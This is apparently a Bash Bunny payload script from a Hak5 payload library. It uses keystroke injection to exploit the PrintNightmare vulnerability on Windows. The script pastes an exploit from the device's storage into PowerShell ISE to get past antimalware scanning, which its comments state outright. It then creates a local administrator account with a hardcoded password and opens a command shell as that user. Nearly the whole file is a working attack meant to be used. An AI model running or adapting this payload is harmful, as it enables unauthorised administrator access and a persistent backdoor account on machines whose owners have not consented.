bashbunny-payloads/payloads/library/execution/PrintNightmare/payload.txt

# Title:         Quick and Dirty PrintNightmare
# Author:        PanicAcid
# Version:       1.0
#
# Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
# As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole
# thing!
# Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and
# Foxtrot for putting up with my nonsense.
#
# Purple.............Loading
# Green .............Execute
# Off................Finished
#
#!/bin/bash

# OPTIONS - More options available in the Powershell payload
OBFUSCATECMD="N" # Y=yes or N=no

#-----------------------------------
# Purple LED - initializing
LED SETUP

GET SWITCH_POSITION
DUCKY_LANG gb

# Attackmode HID
ATTACKMODE HID STORAGE

#-----------------------------------
# Green LED - executing credential_powershell
LED STAGE1
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell.exe
QUACK ENTER
QUACK DELAY 100
QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
QUACK ENTER
QUACK GUI r
QUACK DELAY 300
QUACK STRING powershell_ise.exe
QUACK ENTER
QUACK DELAY 4000
QUACK CONTROL d
QUACK CONTROL v
QUACK CONTROL d
QUACK ENTER
QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
QUACK ENTER
QUACK ALT F4
QUACK GUI r
QUACK DELAY 150
QUACK STRING cmd
QUACK DELAY 150
QUACK ENTER
QUACK DELAY 150
QUACK STRING runas /user:Hak5Rules cmd.exe
QUACK ENTER
QUACK DELAY 150
QUACK STRING Hak5Rules
QUACK DELAY 150
QUACK ENTER
#-----------------------------------
# Kill the lights - finished
LED FINISH